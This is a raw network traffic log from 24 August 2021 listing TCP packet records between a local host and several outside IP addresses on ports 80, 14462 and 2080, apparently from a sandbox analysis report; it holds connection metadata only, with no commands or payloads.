Aug 24, 2021 08:46:59.644530058 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644551039 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644567013 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644575119 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644579887 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644598007 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644618988 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644639015 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644639969 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644659042 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644661903 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644680023 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644684076 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644699097 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644718885 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644722939 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644742012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644746065 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644764900 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644776106 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644785881 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644807100 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644808054 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644826889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644834995 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644846916 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644865990 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644867897 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644887924 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644891024 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644911051 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644918919 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644932032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644952059 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644952059 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644973040 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.644977093 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.644993067 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.645000935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.645013094 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.645018101 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.645035028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.645040035 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.645056963 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.645056963 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.645080090 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.645081997 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.645098925 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.645101070 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.645123005 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.645138979 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.890789986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.890866041 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.370873928 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.370942116 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.592335939 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.613606930 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613641977 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613666058 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613684893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.613692045 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613712072 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613708973 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.613734961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613758087 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613770962 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.613785028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613806963 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613814116 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.613826990 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.613836050 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.613868952 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634607077 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634640932 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634670019 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634694099 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634711027 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634716988 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634731054 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634742022 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634763002 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634766102 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634784937 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634808064 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634808064 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634826899 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634830952 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634854078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634855032 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634875059 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634877920 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634896040 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634901047 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634917021 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634923935 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.634934902 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.634953976 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.637943029 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.658942938 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.658977032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659001112 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659024954 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659045935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.659048080 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659071922 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659087896 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.659096956 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659109116 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.659147024 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659154892 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.659174919 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659190893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.659193993 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:00.659219980 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:00.659238100 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.033910036 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.055680990 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.076400042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.077368021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.099551916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.123358965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.125191927 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:47:01.135255098 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:47:01.141494989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.141572952 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.163816929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.186480999 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:47:01.187531948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.199949980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.200078011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.222583055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.251000881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.288484097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.288589001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.310897112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.336260080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.387686014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.387864113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.409806967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.435610056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.466888905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.466965914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.490860939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.516072035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:01.522785902 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.543282032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543313026 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543335915 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543354988 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543374062 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543387890 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.543395042 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543421984 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543445110 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543464899 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543484926 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.543519020 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.543564081 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.550041914 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.563668966 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563703060 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563728094 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563747883 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563828945 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.563839912 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563864946 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563889027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563913107 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563935995 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563958883 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.563986063 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564012051 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564034939 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564104080 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564129114 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564152002 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564174891 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564197063 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564218044 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564219952 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564233065 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564235926 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564239025 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564241886 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564243078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.564244986 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564248085 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564249992 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564254045 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564296007 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.564316988 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.573453903 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.573652983 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.573873043 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.578180075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:01.584301949 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584378958 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584386110 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584427118 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584487915 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584511042 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584609032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584652901 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584671021 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584687948 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584703922 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584712982 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584736109 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584743977 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584757090 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584769964 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584778070 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584800005 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584810019 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584820986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584841967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584855080 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584862947 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584887981 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584896088 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584909916 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584929943 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584938049 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584952116 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584964991 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.584974051 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.584995031 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585001945 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585042000 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585355043 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585381031 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585402012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585424900 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585445881 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585448027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585469961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585470915 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585494995 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585500002 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585519075 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585541010 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585541964 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585561991 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585583925 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585583925 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585604906 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585613966 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585625887 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585649014 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585650921 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585674047 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585689068 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585697889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585717916 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585725069 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585740089 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.585762024 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.585798979 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.597325087 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598486900 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598519087 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598534107 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598556042 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598582983 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598598957 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598623991 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598654032 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598675966 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598699093 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598725080 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598740101 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598762989 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598790884 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598809004 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.598864079 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.598916054 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.605262995 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605366945 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605415106 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605468035 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605511904 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605554104 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605731010 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605781078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605808020 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605834961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605870008 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605892897 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605916023 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605937958 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605961084 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.605983973 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606004953 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606029987 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606053114 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606076956 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606100082 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606123924 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606168032 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606192112 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606215000 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606241941 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606270075 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606293917 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606317043 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606364012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606405020 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606448889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606451988 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.606473923 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606497049 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606519938 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606543064 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606569052 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606601000 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606621027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.606894016 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.622492075 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622548103 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622565031 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622587919 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622611046 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622628927 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622652054 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622673988 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622690916 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622709036 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622735023 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622750998 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622771978 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622795105 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622796059 CEST	49720	2080	192.168.2.7	185.49.70.90
